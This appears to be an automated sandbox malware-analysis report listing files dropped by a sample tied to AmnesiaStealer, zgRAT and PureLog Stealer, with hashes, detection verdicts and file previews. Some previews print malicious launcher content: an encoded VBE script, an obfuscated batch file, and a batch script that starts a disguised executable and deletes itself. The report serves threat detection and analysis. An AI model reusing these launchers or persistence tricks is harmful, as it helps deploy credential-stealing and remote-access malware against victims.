Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T...T...T...].3.Z......V......V......X......\......P.....W...T...H.....e.....U...._.U.....U...RichT...................PE..d....d.........." ...#.....P...p...q....................................................`.............................................,C......8............ ..\|M...................................................}..@...........................................UPX0.....p..............................UPX1................................@....rsrc....P.......L..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75162\python311.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1703192
Entropy (8bit):	7.993653516397076
Encrypted:	true
SSDEEP:	49152:IHqk+Tq+DBrHf06FQAXUtzI0XTLe0EJNgZAem/Y:sOqCTfXjei0EJNlen
MD5:	5F6FD64EC2D7D73AE49C34DD12CEDB23
SHA1:	C6E0385A868F3153A6E8879527749DB52DCE4125
SHA-256:	FF9F102264D1944FBFAE2BA70E7A71435F51A3E8C677FD970B621C4C9EA71967
SHA-512:	C4BE2D042C6E4D22E46EACFD550F61B8F55814BFE41D216A4DF48382247DF70BC63151068513855AA78F9B3D2F10BA6A824312948324C92DE6DD0F6AF414E8AB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ed..Ed..Ed......Gd......Kd......Id......Md......Ad..L.{._d......Nd..Ed.. e.._...d.._...Dd.._...Dd.._...Dd..RichEd..................PE..d....k.d.........." ...$..........D...]...D...................................^...........`.........................................H.].......].......].......V..0..........(.^.......................................].@...........................................UPX0......D.............................UPX1..........D.....................@....rsrc.........].....................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	630736
Entropy (8bit):	6.409476333013752
Encrypted:	false
SSDEEP:	12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
MD5:	9C223575AE5B9544BC3D69AC6364F75E
SHA1:	8A1CB5EE02C742E937FEBC57609AC312247BA386
SHA-256:	90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
SHA-512:	57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75162\rarreg.key

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	463
Entropy (8bit):	4.457960072068496
Encrypted:	false
SSDEEP:	12:Bn91zXhsxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9NWWDpf025cNU7CIEO
MD5:	1E466C48FE2FEF11884599F81B0CFD5A
SHA1:	8765D27B2D0BD7631A78296DD636E543652301F7
SHA-256:	D6FFB579F6AD67FE16EF0554CACCF30D15895442FA973AEEEE2A78C932BE5B49
SHA-512:	1B777B19120D0368B6175924F028738060FFA112A2C49C3295F032234A4E5DF986250102C6DEED2C81C164B39A5B9D1F578010F044B582F6F583D63DAE0762AD
Malicious:	false
Preview:	RAR registration data.AmnesiaStealer.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.

C:\Users\user\AppData\Local\Temp\_MEI75162\select.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26392
Entropy (8bit):	7.439415387461292
Encrypted:	false
SSDEEP:	768:sjW1g3ldg8d77x55iCpJT9IsQGH/5YiSyvmAMxkE/3:sjW1yldgy75ZT9IsQGHx7SyMxL3
MD5:	45D5A749E3CD3C2DE26A855B582373F6
SHA1:	90BB8AC4495F239C07EC2090B935628A320B31FC
SHA-256:	2D15C2F311528440AA29934920FB0B015EAF8CBE3B3C9AD08A282A2D6BA68876
SHA-512:	C7A641D475A26712652A84B8423155CA347E0EC0155BD257C200225A64752453E4763B8885D8FB043B30E92AE023A501FFF04777BA5CFE54DA9A68071F25FBEA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........t..'..'..'...'..'...&..'...&..'...&..'...&..'...&..'..'..'...&..'...&..'...&..'..c'..'...&..'Rich..'........................PE..d....k.d.........." ...$.0................................................................`......................................... ...L....................`..............l...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75162\sqlite3.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	637720
Entropy (8bit):	7.993996521572114
Encrypted:	true
SSDEEP:	12288:V8tAyniuvdUY0tHTwaj6hlwkhQsf30fmGggZzAOlcK+:VyVimdgHTwajUSOQsf0LNLcK+
MD5:	DBC64142944210671CCA9D449DAB62E6
SHA1:	A2A2098B04B1205BA221244BE43B88D90688334C
SHA-256:	6E6B6F7DF961C119692F6C1810FBFB7D40219EA4E5B2A98C413424CF02DCE16C
SHA-512:	3BFF546482B87190BB2A499204AB691532AA6F4B4463AB5C462574FC3583F9FC023C1147D84D76663E47292C2FFC1ED1CB11BDB03190E13B6AA432A1CEF85C4B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.C...C...C...J.O.......A.......N.......K.......G.......@...C......Y...B...Y...B...Y...B...Y...B...RichC...........................PE..d....l.d.........." ...$.`...0.......+.......................................p............`..........................................K..."...H.......@.......................m.......................................8..@...........................................UPX0....................................UPX1.....`.......Z..................@....rsrc....0...@.......^..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75162\unicodedata.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	302360
Entropy (8bit):	7.987158878300502
Encrypted:	false
SSDEEP:	6144:6k/MXu7k+2xmvrSSrDZm9sR40BQG1pK1fS3KBG/oLwC8t+Ht:6kiuX2xmWIDE9uIpS363LwZKt
MD5:	8C42FCC013A1820F82667188E77BE22D
SHA1:	FBA7E4E0F86619AAF2868CEDD72149E56A5A87D4
SHA-256:	0E00B0E896457ECDC6EF85A8989888CCFBF05EBD8D8A1C493946A2F224B880C2
SHA-512:	3A028443747D04D05FDD3982BB18C52D1AFEE2915A90275264BF5DB201BD4612090914C7568F870F0AF7DFEE850C554B3FEC9D387334D53D03DA6426601942B4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D\|............eG.....c.....c.....c.....c.....b....Ke.......Q...b.....b.....b+.....b....Rich...........................PE..d....k.d.........." ...$.`.......@.......P................................................`.............................................X....................P..0.......................................................@...........................................UPX0.....@..............................UPX1.....`...P...\..................@....rsrc................`..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2xhzwyoa.p20.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_44yr00sr.tds.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a3jcyx4b.kad.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_acc2dxdd.pux.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b2nq4r4h.wzh.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bqc0bc5p.d4f.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fkgsqygb.3m2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gn2di03u.ive.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gx24jv4s.2pz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hkw53haq.jr2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jm53s0ev.f1x.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ka2hvr2k.2na.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mpczfvom.343.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pgcg5otz.3re.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_utieqtxx.uvy.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zg2dcdf5.ddm.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\bba2018c39ea80e6507645609af5208d547f6a81

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with very long lines (336), with no line terminators
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.844636745761889
Encrypted:	false
SSDEEP:	6:djROAXb7HRhtQFcLGX8g8I0ktEF0nYJtkFtMhvaXoOXd/6Dvb1yBLjY7kn:jZh5Zg44UKAhvLQd/6DvZQYg
MD5:	B09754D59FC2472A33E3388C957927AF
SHA1:	9694D6BD82CF64C488F99A79E507ADD6ACBCABA8
SHA-256:	617943BEE56915D97DBF9A1499514803C7235E30A2743082C2EA4295E3382CAE
SHA-512:	0012C764FC4DE2D7E29B53A47FB47D1C4CE1056BD5D92C8A5650C6B643B103F14FBF37D49ACEF369F37A0B82CE3A6732DB7D12F3775C9896BFE8924F367D1C11
Malicious:	false
Preview:	H4sIAAAAAAAEAIWQT0sDMRDFv0roSUG9CCLe2i3tRbEYpYLjIU1m07FJZsmf3e23Ny2l9CJeZh7D8Jv35mvSPAGsKRgeEsAz21ol5kzByn3QANqbOxxxcnPcXEW2UXmxIId180XOCjlTBenIidt8hok1x13reBALLsGoTBwAVDHExl4QPxLGSlKu5VD7/Vy8bn5Q56qzSjtHKf91X1yNjw/XAMPpYrflzKInHDACYLhdzgA2VPrm0+xdakZbVhesc+o3TFyiPgT619+06+Yqq8OrtHIA7+g7AJ+mFkOWqsfkOVDmaqDZKgoNe4mxx3gaH8nfv8jCDTV3AQAA

C:\Users\user\AppData\Local\Temp\e1GzVKWjBx.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	203
Entropy (8bit):	5.20795524904215
Encrypted:	false
SSDEEP:	6:hCRLuVFOOr+DEaQIH11XadvKOZG1923fq9fJK:CuVEOCDEarV1XanC90
MD5:	077C8C8905E1A95316A20C799DEDCDC6
SHA1:	C43E9B4CE785F2E6D6AC29C87ED04981E0E91757
SHA-256:	D0CB85FBA8A4111A21FF199664129727BDEA1989A0942737461F2A2E831686D2
SHA-512:	06AE92C1A75D6819D51F91C8C4B36B8FA3ABB4E48B357CA60D318B228A9B87C1D58C154925D831DA1F8AD96E1D6DB962AFD85B9A0F95F103CF80E68F2777A2CF
Malicious:	false
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\audiodg.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\e1GzVKWjBx.bat"

C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3720704
Entropy (8bit):	7.733352681119499
Encrypted:	false
SSDEEP:	98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
MD5:	5FE249BBCC644C6F155D86E8B3CC1E12
SHA1:	F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
SHA-256:	9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
SHA-512:	B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...

C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	103
Entropy (8bit):	5.031377595969092
Encrypted:	false
SSDEEP:	3:svwBUcsAoQEHTDWC26AHMKvMSQL4cSv:sYBfvQT4bMKvMSQkfv
MD5:	77218AE27E9AD896918D9A081C61B1BE
SHA1:	3C8EBAA8FA858B82E513CCF482E11172B0F52CE0
SHA-256:	E09540A47F3647A9FDF9673281E2664441BBAEE8D3236D22B1875B9D23ABACAB
SHA-512:	6A16B367A762132172830FD81C41C58AC49DE788EED93D4C5526F8F0E6859703B336A137FD8D4FE7088B4110D72E5F4767B6462BC4651769924B67305719F30A
Malicious:	true
Preview:	%lJWFircOu%%nvRebZgpg%..%kImkMpPKuFLx%"%Temp%\msAgentSavesmonitor/ChainComServermonitor.exe"%EaZpTohGW%

C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	217
Entropy (8bit):	5.712224367043722
Encrypted:	false
SSDEEP:	6:GmvwqK+NkLzWbHnPv7qK+NkLzWHFojm8eGxjs:G1MCzWLnP/MCzWlStjs
MD5:	D6DA6166258E23C9170EE2A4FF73C725
SHA1:	C3C9D6925553E266FE6F20387FEEE665CE3E4BA9
SHA-256:	78EE67A8AE359F697979F4CD3C7228D3235C32D3B611303E070B71414591BA1E
SHA-512:	37A5A18ACBB56E5458BAEBB12A4D3B3229B218EB606BE3535D1C30E8E0D4FA969543889C587078456321209FE4503688432F45FF35A7AF598B770393E7AE3B05
Malicious:	true
Preview:	#@~^wAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.U^DbwO UV+n2v!b@#@&j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.k4?4+sscIEU~r]P+s2uzhkbT+xD?m-+k:GxbYG.JzWVLX!V/bTfL+2}&dL//c4CYrSPZ~~WmV/n8j0AAA==^#~@.

C:\Users\user\AppData\Local\Temp\nNYtj6UNv5

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.243856189774724
Encrypted:	false
SSDEEP:	3:FtCsW3DZzPn:6DpPn
